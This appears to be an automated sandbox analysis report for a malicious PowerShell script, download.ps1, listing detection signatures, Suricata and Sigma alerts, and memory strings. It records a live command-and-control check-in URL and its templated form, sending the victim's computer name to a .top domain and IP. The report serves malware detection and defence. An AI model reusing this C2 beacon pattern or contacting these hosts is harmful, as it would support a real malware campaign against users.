Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1584476
MD5:9634cf38abc46be36b46474f183913a7
SHA1:c07fa000b7acd4fef57a14693dc6639e70d0af2b
SHA256:64a364c581318226bdeee69fdd6097a2b17599e9eaccea487e01c878424ab7fc
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7572, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7572, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:25:01.681401+010020577411A Network Trojan was detected192.168.2.44973045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:25:00.403802+010028594881Domain Observed Used for C2 Detected192.168.2.4594541.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:25:01.681401+010018100002Potentially Bad Traffic192.168.2.44973045.61.136.13880TCP
2025-01-05T16:25:02.343076+010018100002Potentially Bad Traffic192.168.2.449731142.250.185.6880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.8% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1725656350.000001FE473E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbI source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1725656350.000001FE473E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Automation.pdba source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6181E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb^h source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6181E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6178B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbCpJa source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000000.00000002.1861814628.000001FE6178B000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859488 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:59454 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.68:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3qyXsaRs6IMLSX2uwuSEs0RcQMyn_Ds" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3qyXsaRs6IMLSX2uwuSEs0RcQMyn_Ds" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="yaNCczj9r_UV-cif63DLTA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0a
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQ8IcBCAY equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kcehmenjdibnmni.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4A982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=527
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1861632253.000001FE616A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4A982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4A982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1861814628.000001FE6178B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DD62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4BB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4B829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4BB2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4B82D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1727138891.000001FE49441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1727138891.000001FE49668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1727138891.000001FE49441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DCA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DD62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE594B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4D962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4DC8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AD5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
